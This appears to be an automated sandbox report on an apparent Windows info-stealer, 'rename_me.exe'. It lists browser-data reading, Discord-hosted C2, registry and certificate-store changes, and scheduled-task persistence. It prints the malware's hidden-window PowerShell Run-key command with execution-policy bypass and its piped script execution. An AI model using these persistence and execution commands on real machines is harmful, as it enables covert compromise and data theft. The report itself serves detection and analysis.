Malware Analysis Report

2025-03-15 00:55

Sample ID 240626-qhpb6syfqk
Target rename_me.exe
SHA256 d2aa93a274505ba40616e3fe4b2753c5f80bac609dd3c3a8410850dd214258f0
Tags defense_evasion execution persistence spyware stealer
Score 8/10

Analysis Overview

Score 8/10

SHA256 d2aa93a274505ba40616e3fe4b2753c5f80bac609dd3c3a8410850dd214258f0

Threat Level: Likely malicious

The file rename_me.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Hide Artifacts: Hidden Window

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Enumerates physical storage devices

Modifies registry key

Enumerates processes with tasklist

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported 2024-06-26 13:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-06-26 13:15

Reported 2024-06-26 14:15

Platform win10v2004-20240508-en

Max time kernel 1783s

Max time network 1785s

Command Line

"C:\Users\Admin\AppData\Local\Temp\rename_me.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\rename_me.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tjolRgZfkQWyznu.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\cscript.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\cscript.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\cscript.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4640 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 1512 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1512 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1512 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3516 wrote to memory of 1368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3516 wrote to memory of 1368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1368 wrote to memory of 3228 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1368 wrote to memory of 3228 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4640 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4956 wrote to memory of 4048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4956 wrote to memory of 4048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4640 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 2744 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2744 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4640 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 5096 wrote to memory of 384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5096 wrote to memory of 384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2368 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2368 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 2532 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2532 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 3356 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3356 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3236 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3236 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4640 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 1516 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1516 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3612 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2576 wrote to memory of 396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 396 wrote to memory of 3900 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 396 wrote to memory of 3900 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3924 wrote to memory of 1896 N/A C:\Windows\system32\cscript.EXE C:\Windows\system32\cmd.exe
PID 3924 wrote to memory of 1896 N/A C:\Windows\system32\cscript.EXE C:\Windows\system32\cmd.exe
PID 1896 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 4156 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 4156 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1896 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1896 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1896 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1896 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1896 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 860 wrote to memory of 576 N/A C:\Windows\system32\cscript.EXE C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 576 N/A C:\Windows\system32\cscript.EXE C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\rename_me.exe

"C:\Users\Admin\AppData\Local\Temp\rename_me.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtagxonl\qtagxonl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

